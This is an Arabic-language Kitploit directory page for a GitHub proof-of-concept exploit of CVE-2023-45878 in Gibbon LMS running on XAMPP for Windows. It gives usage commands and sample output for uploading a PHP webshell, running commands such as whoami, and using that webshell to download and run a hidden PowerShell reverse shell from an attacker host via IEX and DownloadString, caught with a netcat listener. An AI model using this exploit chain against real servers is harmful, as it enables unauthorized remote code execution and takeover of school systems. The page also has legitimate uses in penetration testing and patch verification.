Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45878-POC — CVE-2023-45878 poc لـ Gibbon LMS على XAMPP لنظام Windows | Kitploit
أدوات/GitHubGitHub/pauldhaes/cve-2023-45878-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubpauldhaes/cve-2023-45878-poc

CVE-2023-45878-POC

CVE-2023-45878 poc لـ Gibbon LMS على XAMPP لنظام Windows

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45878-POC

CVE-2023-45878 poc لـ gibbon LMS على xampp ويندوز. ارفع webshell باسم shell.php لغرض حقن الأوامر. للحصول على reverse shell، ارفع سكربت powershell reverse shell بصيغة ps1 باسم shell.ps1، ويتم رفعه إلى الجهاز المستهدف باستخدام shell.php.

المتطلبات

Python3 وحدة Requests الخاصة بـ python3 netcat

root@kitploit:~
pip3 install requests

البيئة الافتراضية

root@kitploit:~
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests

الاستخدام

تم اختباره على Gibbon LMS الذي كان يعمل على XAMPP ويندوز بدون تفعيل برنامج مكافحة الفيروسات. يمكن العثور على الهدف من خلال صفحة تسجيل الدخول الخاصة بـ Gibbon، مثال: http://gibbon-example/Gibbon-LMS/

الـ reverse shell

root@kitploit:~
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT

النتيجة

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>

أمر واحد

root@kitploit:~
python3 reverse.py --single -target_url http://target -command whoami

النتيجة

root@kitploit:~
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice

الاعتمادات

https://herolab.usd.de/security-advisories/usd-2023-0025/

تنزيل الأداة